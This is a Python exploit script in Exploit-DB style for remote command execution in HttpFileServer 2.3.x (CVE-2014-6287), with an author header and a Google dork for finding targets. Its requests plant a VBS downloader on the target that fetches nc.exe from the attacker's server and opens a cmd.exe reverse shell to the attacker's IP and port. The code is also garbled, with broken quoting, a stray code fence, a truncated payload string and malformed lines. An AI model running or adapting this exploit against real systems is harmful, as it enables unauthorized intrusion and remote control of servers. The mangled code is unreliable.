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#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#             It's different from classic file sharing because it uses web technology to
#             be more compatible with today's Internet.
#             It also differs from classic web servers because it's very easy to use and
#             runs "right out-of-the box". Access your remote files, over the network. It has been
#             successfully tested with Wine under Linux.

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat
#(http://<attackers_ip>:80/nc.exe).
#       You may need to run it multiple times for success!

import urllib2
import sys

try:
    def script_create():
        urllib2.urlopen("http://" + sys.argv[1] + ":" + sys.argv[2] + "/" +
search=%00{.+"+save+"}.}")

    def execute_script():
        urllib2.urlopen("http://" + sys.argv[1] + ":" + sys.argv[2] + "/" +
search=%00{.+"+exe+"}.}")

    def nc_run():
        urllib2.urlopen("http://" + sys.argv[1] + ":" + sys.argv[2] + "/" +
search=%00{.+"+exe1+"}.}")
```

```
ip_addr = "192.168.44.128" #local IP address
local_port = "443" # Local Port number
vbs =
"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft
save= "save|" + vbs
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe= "exec|" + vbs2
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1= "exec|" + vbs3
script_create()
execute_script()
nc_run()
except:
print ""[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script""
```

